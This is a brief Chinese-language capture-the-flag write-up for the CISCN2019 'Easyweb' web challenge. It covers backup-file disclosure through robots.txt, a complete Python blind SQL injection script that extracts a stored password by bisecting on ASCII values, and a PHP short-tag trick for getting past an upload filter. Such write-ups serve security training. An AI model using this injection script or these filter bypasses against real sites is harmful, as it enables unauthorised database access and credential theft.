刷題記錄:[CISCN2019 總決賽 Day2 Web1]Easyweb
題目復現鏈接:https://buuoj.cn/challenges
參考鏈接:BUUCTF的wp(隨時棄坑)
一、涉及知識點
1、敏感文件泄露
訪問robots.txt可以得到image.php.bak
2、繞過及sql注入
貼上腳本
import requests
url = r'http://6873d13e-5f19-42e4-bb8f-dec6d9acdeb3.node1.buuoj.cn/image.php'
result = ''
for x in range(0, 100):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload = " or id=if(ascii(substr((select password from users limit 1 offset 0),%d,1))>%d,1,0)#" % (x, mid)
params = {
'id':'\\\\0',
'path':payload
}
response = requests.get(url, params=params)
if b'JFIF' in response.content:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(int(mid))
print(result)
3、文件上傳:短標簽繞過php過濾
PHP開啟短標簽即short_open_tag=on
時,可以使用<?=$_?>
輸出變量